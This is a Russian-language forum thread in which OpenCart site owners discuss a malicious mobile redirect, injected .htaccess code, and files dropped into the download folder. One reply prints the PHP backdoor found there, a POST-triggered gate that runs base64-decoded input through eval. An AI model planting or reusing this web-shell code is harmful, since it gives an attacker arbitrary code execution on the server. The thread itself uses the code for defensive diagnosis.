Перейти к содержанию
dexion

Похоже на сайт попал вирус

Рекомендуемые сообщения

Доброй ночи всем.

Возникла следующая ситуация: при заходе на мой сайт ** с iPhone возникает необычная проблема (скрины во вложении). 

Действительно ли это вирус? Как с ним бороться?

 

 

*решено

post-675101-0-56368900-1392944577_thumb.jpg

post-675101-0-98666100-1392944577_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вредоносное ПО установлено у вас на сервере. В этом нет никаких сомнений.

с вашего сайта происходит редирект на сайт злоумышленников.

 

Как бороться? В двух словах этого не описать. И тем более не зная всей картины.

 

Попробуйте обратиться с этой проблемой в "платные услуги".

Но только нужно понимать, что даже если вычистить всю нечисть, которая сейчас есть на сайте, то она может появиться снова если есть, например, на вашем хостинг-аккаунте сайты на вордпресс или джумле.  также возможна брешь у хостера и куча других банальностей (наличие паролей доступа у третьих лиц, кража ftp-паролей с вашего компьютера вирусом).

 

Это я пишу к тому, что нельзя гарантировать 100% безопасность сайта в дальнейшем даже после успешной зачистки сервера.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Удалось решить проблему простым удалением вредоносного кода из .htaccess.

Возможно это только временное решение, посмотрим.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Удалось решить проблему простым удалением вредоносного кода из .htaccess.

Возможно это только временное решение, посмотрим.

 

поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины.

код ведь не их воздуха возник сам по себе.

его туда внедрили.  когда перекроете дыру, только тогда можете говорить о решении проблемы.

 

У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

шаблон купленый?  ;)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Посмотрите в папку downloads, там тоже будет много вкусного!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

шаблон купленый?  ;)

нет, шаблон дефолтный

 

 

поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины.

код ведь не их воздуха возник сам по себе.

его туда внедрили.  когда перекроете дыру, только тогда можете говорить о решении проблемы.

 

У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД).

да, согласен. а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? или наводку кинете. а то в интернете как то не особо много информации про поиск и лечение вирусов на опенкарте

 

 

Посмотрите в папку downloads, там тоже будет много вкусного!

спасибо, глянем

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Посмотрите в папку downloads, там тоже будет много вкусного!

в папке download лежат 4 файла http://prntscr.com/2uhwdp :

1) пустой index.php

2) и 3) для маркета

4) непонятно что это и откуда взялось, дата 17.02 относительно недавняя (с какого момента появился этот вирус не знаю, обнаружил только вчера случайно зайдя с телефона). содержание файла примерно следующее: http://prntscr.com/2uhxcr

можно ли считать 4й вариант причиной этой проблемы? 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с  варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит  положение в поиске  найти лечение .  :ugeek:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с  варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит  положение в поиске  найти лечение .   :ugeek:

 

Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами.

В них может оказаться много полезной информации для опытного человека.

это как симптомы болезни для врача.

 

даже установленные права на эти файлы - это уже показатель.

 

у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри.

для этого нужны коды доступа (в личку, конечно).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
<?php
if(isset($_POST['execgate'])) {
	set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}}
}
?>

вот это довольно давно уже было на сайте.

ворота нараспашку.  т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается.

 

но до поры до времени никто не заходил через эти ворота.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

 

а может подскажете, каким образом можно обнаружить первоначальную причину всего этого?

анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код.

 

встречались ли вы с таким подходом?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А какая версия opencart у вас?

Потому что очень уж спокойно вам залили shell в папку download

Какие модули стоят и какие vqmod допилы?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код.

 

встречались ли вы с таким подходом?

 

Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п.

Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
А какая версия opencart у вас?

 

 

для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Такая же фигня

переадресация с данным плеером на сайт люксут

причем на всех сайтах на аккаунте хостера

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Такая же фигня

переадресация с данным плеером на сайт люксут

причем на всех сайтах на аккаунте хостера

а какой у вас хостинг? 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Такая же фигня

переадресация с данным плеером на сайт люксут

причем на всех сайтах на аккаунте хостера

 

 

не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам.

 

Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах.  Назначают всем папкам права 777, например (так ведь быстрее движок установить!).

Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам.

 

Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах.  Назначают всем папкам права 777, например (так ведь быстрее движок установить!).

Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема.

 

у меня не на всех папках права 777)))

только на 2-х

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

у меня не на всех папках права 777)))

только на 2-х

 

 

у вас - да.  а у топикстартера, например, все 777, что весьма нехорошо.

 

В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются).  Через них ломают в первую очередь.

 

А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера.

хостинги у вас разные.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

у вас - да.  а у топикстартера, например, все 777, что весьма нехорошо.

 

В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются).  Через них ломают в первую очередь.

 

А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера.

хостинги у вас разные.

http://bestsantehnika.com/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

2c4and,  движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore.

как вариант, дело в модулях, полученных из ненадежных источников.  но не обязательно.

 

Если скинете коды доступа в личку, то могу внимательнее посмотреть.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.